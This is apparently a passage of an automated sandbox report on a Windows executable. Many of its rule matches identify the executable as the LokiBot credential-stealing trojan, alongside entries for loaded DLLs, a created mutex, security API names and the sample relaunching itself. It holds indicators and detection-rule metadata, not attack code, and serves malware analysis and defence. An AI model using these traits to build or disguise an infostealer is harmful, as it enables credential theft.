                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_02890AD00_2_02890AD0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_02890AE00_2_02890AE0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_028951280_2_02895128
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_028914900_2_02891490
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_06CE81500_2_06CE8150
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_06CE71080_2_06CE7108
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_06CEF8D00_2_06CEF8D0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_06CEEDB00_2_06CEEDB0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_06CEF8620_2_06CEF862
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 3_2_0040549C3_2_0040549C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 3_2_004029D43_2_004029D4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: String function: 00405B6F appears 42 times
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeStatic PE information: invalid certificate
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe, 00000000.00000002.2147770493.000000000A0E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe, 00000000.00000002.2143797691.00000000044E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe, 00000000.00000002.2141833258.0000000000B5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe, 00000000.00000002.2143047437.0000000002A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe, 00000000.00000002.2147352909.00000000070F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeBinary or memory string: OriginalFilenameVgDF.exeX vs SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000000.00000002.2143797691.00000000044CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.2143797691.00000000044CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.2143797691.00000000044CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe PID: 4724, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe PID: 5780, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, xHdZDuN64xOUNM1w8q.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, xHdZDuN64xOUNM1w8q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, xHdZDuN64xOUNM1w8q.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, xHdZDuN64xOUNM1w8q.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, xHdZDuN64xOUNM1w8q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, xHdZDuN64xOUNM1w8q.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, xHdZDuN64xOUNM1w8q.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, xHdZDuN64xOUNM1w8q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, xHdZDuN64xOUNM1w8q.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, A0TVRGnLJriQNkOpn2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, A0TVRGnLJriQNkOpn2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, A0TVRGnLJriQNkOpn2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@0/1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_0040650A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,3_2_0040434D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.logJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeMutant created: NULL
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeReversingLabs: Detection: 23%
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeVirustotal: Detection: 35%
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: userenv.dllJump to behavior
